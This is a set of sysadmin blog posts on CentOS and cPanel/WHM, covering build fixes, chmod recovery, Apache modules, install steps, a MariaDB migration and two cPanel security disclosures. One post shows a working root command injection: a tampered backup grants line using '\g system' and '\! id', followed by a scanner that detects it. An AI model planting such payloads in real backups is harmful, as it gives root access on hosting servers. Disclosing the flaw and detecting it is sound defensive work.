error: field ‘st_atim’ has incomplete type FFMPEG

While installing ffmpeg-php-0.6.0 on a CentOS server, you may come across an error like the one below:

In file included from /usr/include/sys/stat.h:107,
 from /usr/include/php/main/php_streams.h:28,
 from /usr/include/php/main/php.h:395,
 from /root/ffmpeg-php-0.6.0/ffmpeg-php.c:40:
/usr/include/bits/stat.h:91: error: field ‘st_atim’ has incomplete type
/usr/include/bits/stat.h:92: error: field ‘st_mtim’ has incomplete type
/usr/include/bits/stat.h:93: error: field ‘st_ctim’ has incomplete type
/usr/include/bits/stat.h:152: error: field ‘st_atim’ has incomplete type
/usr/include/bits/stat.h:153: error: field ‘st_mtim’ has incomplete type
/usr/include/bits/stat.h:154: error: field ‘st_ctim’ has incomplete type
In file included from /usr/include/php/main/php_streams.h:28,
 from /usr/include/php/main/php.h:395,
 from /root/ffmpeg-php-0.6.0/ffmpeg-php.c:40:
/usr/include/sys/stat.h:367: error: array type has incomplete element type
/usr/include/sys/stat.h:374: error: array type has incomplete element type
In file included from /usr/include/php/main/php.h:401,
 from /root/ffmpeg-php-0.6.0/ffmpeg-php.c:40:
/usr/include/php/TSRM/tsrm_virtual_cwd.h:218: error: expected specifier-qualifier-list before ‘time_t’
/usr/include/php/TSRM/tsrm_virtual_cwd.h:246: error: expected declaration specifiers or ‘...’ before ‘time_t’
/root/ffmpeg-php-0.6.0/ffmpeg-php.c: In function ‘zm_startup_ffmpeg’:
/root/ffmpeg-php-0.6.0/ffmpeg-php.c:94: warning: implicit declaration of function ‘avcodec_init’

After looking into it for hours, I found that ffmpeg's own time.h file was conflicting with CentOS's own time.h file. Unfortunately, ffmpeg-php has not been updated in a long time, so I decided to search for the ffmpeg-php extension on GitHub, and I found a repo maintained by tony2001, who has made some changes to the original project. Using his repo I’m able to install it on CentOS-6.5, but I guess it works on other CentOS versions too.

Follow the steps below to install it

git clone https://github.com/tony2001/ffmpeg-php.git
cd ffmpeg-php
phpize
./configure
make && make install

 

Just try:: chmod -x /bin/chmod

What will happen if you remove the executable flag from the chmod binary itself? :D

root@server:~# chmod -x /bin/chmod
root@server:~# 
root@server:~# chmod +x /bin/chmod
-bash: /bin/chmod: Permission denied
root@server:~# ls -ld /bin/chmod
-rw-r--r-- 1 root root 51760 Apr  1  2012 /bin/chmod

How do you recover chmod in this case and make it executable again?  Here is a list of possible solutions :D

1) perl -e 'chmod 0755, "/bin/chmod"'
2) 32 bit OS
     /lib/ld-linux.so.2 /bin/chmod +x /bin/chmod
   64 bit OS
     /lib64/ld-linux-x86-64.so.2 /bin/chmod +x /bin/chmod
3) install -m a+x /bin/chmod /root/chmod
   /root/chmod +x /bin/chmod
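4)  cat > chmod.c << 'EOF'
#include <stdio.h>

/* Any program will do: only the executable bit on the compiled file matters. */
int main(void)
{
    printf("Hello World");
    return 0;
}
EOF

# gcc creates /tmp/chmod with the executable bit set
gcc chmod.c -o /tmp/chmod
# overwrite its contents with the real chmod; the file mode is kept
cat /bin/chmod > /tmp/chmod
/tmp/chmod +x /bin/chmod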

 

mod_reverseproxy: extract client IP from reverse proxy

If you set up Apache 2.4 with mod_remoteip, the Apache ExtendedStatus page always shows the proxy IP instead of the client IP. This is because mod_status sets the client IP very early, when there is a TCP connection but no headers yet. Apache 2.4 allows a per-request override of the client address, but not at this early stage. To overcome this issue, I would suggest using the mod_reverseproxy Apache module; the module is completely based on mod_cloudflare and mod_remoteip.

To install, follow the instructions on:

 

   wget https://raw.github.com/Prajithp/mod_reverseproxy/master/mod_reverseproxy.c
   apxs -i -c -n mod_reverseproxy.so mod_reverseproxy.c  

Configuration Directives

ReverseProxyEnable           (On|Off)          - Enable reverse proxy

ReverseProxyRemoteIPHeader   X-Real-IP         - The header to use for the real IP
                                                 address.
ReverseProxyRemoteIPTrusted  127.0.0.1         -  What IPs to adjust requests for

Example Configuration

LoadModule reverseproxy_module modules/mod_reverseproxy.so

<IfModule reverseproxy_module>
  ReverseProxyEnable  On
  ReverseProxyRemoteIPHeader X-Real-IP
  ReverseProxyRemoteIPTrusted 127.0.0.1
  ReverseProxyRemoteIPTrusted 46.105.160.192
</IfModule>

NOTES:

  • If mod_cloudflare or mod_remoteip are already loaded on the same web server, the web server will crash because both modules try to set the remote IP to a different value.

https://github.com/Prajithp/mod_reverseproxy
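
The trust rule that the ReverseProxyRemoteIPHeader and ReverseProxyRemoteIPTrusted directives describe, modelled as an added example (not code from mod_reverseproxy): the header is honoured only when the TCP peer is a listed proxy. The function name, exact-address matching and the fallback to the peer address on a malformed value are assumptions of this sketch.

```python
import ipaddress

def effective_client_ip(peer_ip, headers, trusted, header_name="X-Real-IP"):
    """Model of the trust rule: honour the header only when the TCP peer is a
    listed proxy and the header value parses as an IP address."""
    peer = ipaddress.ip_address(peer_ip)
    if peer not in {ipaddress.ip_address(t) for t in trusted}:
        # Direct connection: the header is client-controlled, so ignore it.
        return str(peer)
    # HTTP header names are case-insensitive.
    value = next((v for k, v in headers.items()
                  if k.lower() == header_name.lower()), None)
    if value is None:
        return str(peer)
    try:
        return str(ipaddress.ip_address(value.strip()))
    except ValueError:
        # Malformed value from the proxy: fall back to the peer address.
        return str(peer)

# Trusted list taken from the example configuration above; the client
# addresses are constructed (documentation ranges).
TRUSTED = ["127.0.0.1", "46.105.160.192"]

if __name__ == "__main__":
    cases = [
        ("46.105.160.192", {"X-Real-IP": "203.0.113.7"}),   # via trusted proxy
        ("198.51.100.9",   {"X-Real-IP": "127.0.0.1"}),     # header from untrusted peer
        ("127.0.0.1",      {"x-real-ip": "not-an-ip"}),     # malformed value
    ]
    for peer, hdrs in cases:
        print(peer, hdrs, "->", effective_client_ip(peer, hdrs, TRUSTED))
```

Every address that is allowed to set the client IP belongs in the trusted list and nowhere else; any other peer that sends the header is logged under its own connection address.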

WHM/cPanel Cross-Site Scripting Vulnerability

WHM/cPanel is prone to cross-site scripting vulnerabilities because it fails to properly sanitize user input and datastore files.

Due to the nature of this security flaw,  I will not be posting a Proof of Concept until much later.

 

Type: XSS
Product: cPanel
Website: http://www.cpanel.net
Vulnerable Version: WHM 11.40 and prior.
Date: 11/11/2013
By: Prajith P <http://prajith.in>

Vendor Contact Timeline:

2013-11-11: 3:37 AM IST – Vendor contacted via email.

2013-11-11: 7:44 AM IST – Vendor confirmed the vulnerability and filed a security report (case number 82701).

Don’t restore cPanel backup from untrusted source

In WHM, there is a “restore account” feature which is used to restore a full account backup. Normal users can generate the backup from cPanel, and it contains all the information for an account, including the files and metadata.

One of the metadata items is the MySQL grants file, which is located inside the backup file. When you restore the account using the WHM UI or the restorepkg command, the MySQL meta file is restored as the root user.
Now you may be thinking that there’s nothing wrong and everything looks normal. But this is really, really bad, because you can embed arbitrary commands in SQL files, and those commands will execute when the file is restored as the root user. Let me explain.

 

root@server1 [/home/prajith]# cat mysql.sql
\! id
root@server1 [/home/prajith]# mysql < mysql.sql
uid=0(root) gid=0(root) groups=0(root)
root@server1 [/home/prajith]

So we can insert any Linux commands into the MySQL meta file, and they will be executed as root while restoring the account.

Here is an example:

  GRANT USAGE ON *.* TO 'whmtest'@'localhost' IDENTIFIED BY PASSWORD '*A4E12252EACEA5A79<XXXXX>E11D47296FE237D5897'\g system /etc/.my.cnf >> /tmp/test.txt;
GRANT ALL PRIVILEGES ON `whmtest\_pop`.* TO 'whmtest'@'localhost';

While restoring the account, mysql will execute the Linux commands using the system function and the output will be saved to /tmp/test.txt, which we can later read using an HTTP request. So don’t restore a backup from an untrusted source :D
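
A heuristic pre-restore check for the problem described above, as an added example that is not part of the original post or of cPanel: it tokenizes a grants file and reports mysql client commands found outside quoted text. The function name, the list of long-form commands and the two sample files are assumptions made for the example.

```python
import re

# Long-form mysql client commands that reach a shell or the filesystem.
# Assumption for this example: the list is illustrative, not exhaustive.
RISKY_WORDS = {"system", "source", "tee", "pager", "edit"}

TOKEN = re.compile(r"""
    '(?:\\.|''|[^'\\])*'      # single-quoted string (password hash, user, host)
  | "(?:\\.|""|[^"\\])*"      # double-quoted string
  | `(?:``|[^`])*`            # backtick identifier, e.g. `whmtest\_pop`
  | (?P<bs>\\.)               # backslash command outside any quotes: \! \. \g ...
  | (?P<sep>[;\n])            # statement or line boundary
  | (?P<word>[A-Za-z_]+)
  | (?P<other>\S)
""", re.X | re.S)

def scan_grants(text):
    """Return [(line_no, token)] for mysql client commands outside quoted text."""
    findings, stmt_start = [], True
    for m in TOKEN.finditer(text):
        line_no = text.count("\n", 0, m.start()) + 1
        if m.group("bs"):
            findings.append((line_no, m.group("bs")))
            stmt_start = m.group("bs") in ("\\g", "\\G")   # \g ends a statement
        elif m.group("sep"):
            stmt_start = True
        elif m.group("word"):
            if stmt_start and m.group("word").lower() in RISKY_WORDS:
                findings.append((line_no, m.group("word")))
            stmt_start = False
        else:                       # quoted text or other punctuation
            stmt_start = False
    return findings

# Constructed samples: a clean grants file and one carrying client commands.
CLEAN = r"""GRANT USAGE ON *.* TO 'u'@'localhost' IDENTIFIED BY PASSWORD '*HASH';
GRANT ALL PRIVILEGES ON `u\_db`.* TO 'u'@'localhost';
"""
TAMPERED = r"""GRANT USAGE ON *.* TO 'u'@'localhost' IDENTIFIED BY PASSWORD '*HASH'\g system id;
\! id
"""

if __name__ == "__main__":
    print(scan_grants(CLEAN))      # []
    print(scan_grants(TAMPERED))   # [(1, '\\g'), (1, 'system'), (2, '\\!')]
```

The escaped underscore inside the backtick-quoted database name is normal in a grants file, which is why the check tracks quoting instead of flagging every backslash. Any finding means the backup should not be restored before the file has been reviewed by hand.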

Update:: Mod_Pagespeed

We’ve upgraded Mod_Pagespeed Easyapache Build to stable version. You can find the source on github.

 

Installation instructions

  1. Clone the installation scripts onto your CPanel server:
    $> git clone http://github.com/pagespeed/cpanel.git /var/cpanel/easy/apache/custom_opt_mods/Cpanel/
    
  2. Create Speed.pm.tar.gz
    $> cd /var/cpanel/easy/apache/custom_opt_mods/Cpanel/Easy && tar -zcvf Speed.pm.tar.gz pagespeed
    
  3. Log in to your cPanel WHM > EasyApache and look for the “mod_pagespeed” option. Alternatively, you can run the easyapache installer from the command line (/scripts/easyapache). Rebuild the Apache server, reboot it, and you’re good to go!

Configuring mod_pagespeed

The installation script will copy a default pagespeed.conf file into /usr/local/apache/conf/ on your server. Please consult the following pages to customize your configuration:

For examples of the different filters in action and detailed documentation for each, please see modpagespeed.com

ApacheBooster V1.9 Stable released

We are pleased to announce the release of ApacheBooster v1.9

We’ve upgraded ApacheBooster to 1.9. We have made several changes in configuration and also fixed some bugs. Please see the new features and updates.

1) Fixed WHM interface issue.

2) Fixed WHM ACL bug.

3) Created Custom ACL for WHM.

4) Fixed Uninstall script bug.

If you need any help, find any bug, or need any new feature, please feel free to contact me.

Please do the following steps to upgrade.

wget http://prajith.in/downloads/updateapachebooster
sh updateapachebooster

Installation

 

wget http://prajith.in/downloads/apachebooster.tar.gz
tar -zxf apachebooster.tar.gz
cd apachebooster
bash install.sh   # or: sh install.sh

Install MariaDB in cPanel/WHM

MariaDB is “An enhanced, drop-in replacement for MySQL”. Below you will find some steps on how to effectively stop cPanel/WHM from maintaining MySQL and begin utilizing MariaDB for any and all database activity on your server. Please note that once cPanel/WHM no longer maintains MySQL on your system, it is on the Systems Administrator to manage and maintain any updates and maintenance on the database software. We recommend that only experienced systems administrators perform these steps, and we are not responsible for any possible data loss.

 

Step 1: Backup existing MySQL data

Make sure to save all existing data just in case there are any issues.

cp -Rf /var/lib/mysql /var/lib/mysql-old
mv /etc/my.cnf /etc/my.cnf-old

## Also take an SQL dump of the existing databases, so that we can avoid data loss

Step 2: Disable the targets so cPanel no longer handles MySQL updates #ONLY FOR cPanel 11.36+

The following will mark the versions of MySQL we distribute as uninstalled so they are no longer maintained by cPanel/WHM

/scripts/update_local_rpm_versions --edit target_settings.MySQL50 uninstalled
/scripts/update_local_rpm_versions --edit target_settings.MySQL51 uninstalled
/scripts/update_local_rpm_versions --edit target_settings.MySQL55 uninstalled

Step 3: Remove existing MySQL RPMs so there's a clean slate for MariaDB

Important: The below command will uninstall the MySQL RPMs!
/scripts/check_cpanel_rpms --fix --targets=MySQL50,MySQL51,MySQL55
[20130623.211100]    
[20130623.211100]   The following RPMs are unneeded on your system and should be uninstalled:
[20130623.211100]   MySQL55-client.5.5.31-1.cp1136
[20130623.211100]   MySQL55-devel.5.5.31-1.cp1136
[20130623.211100]   MySQL55-server.5.5.31-1.cp1136
[20130623.211100]   MySQL55-shared.5.5.31-1.cp1136
[20130623.211100]   MySQL55-test.5.5.31-1.cp1136
0
[20130623.211100]   Removing 0 broken rpms: 
[20130623.211100]   rpm: no packages given for erase
[20130623.211100]   No new RPMS needed for install
[20130623.211100]   Uninstalling unneeded rpms: MySQL55-test MySQL55-server MySQL55-client MySQL55-shared MySQL55-devel

Step 4: Create a yum repository for MariaDB

Go to https://downloads.mariadb.org/mariadb/repositories, select your distro, and place the repo content in /etc/yum.repos.d/MariaDB.repo

Example (in my case):
#vi /etc/yum.repos.d/MariaDB.repo

# MariaDB 5.5 CentOS repository list - created 2013-06-23 21:13 UTC
# http://mariadb.org/mariadb/repositories/
[mariadb]
name = MariaDB
baseurl = http://yum.mariadb.org/5.5/centos6-amd64
gpgkey=https://yum.mariadb.org/RPM-GPG-KEY-MariaDB
gpgcheck=1

Step 5: Install MariaDB using the following command

yum install MariaDB-server MariaDB-client MariaDB-devel

## If you have any dependency problems, remove php from the /etc/yum.conf file and then run the yum command again. Add it back to yum.conf once the packages are installed.

/etc/init.d/mysql start
mysql_upgrade
/etc/init.d/mysql restart

Final Step: Rebuild easyapache/php to ensure modules are intact/working

/scripts/easyapache --build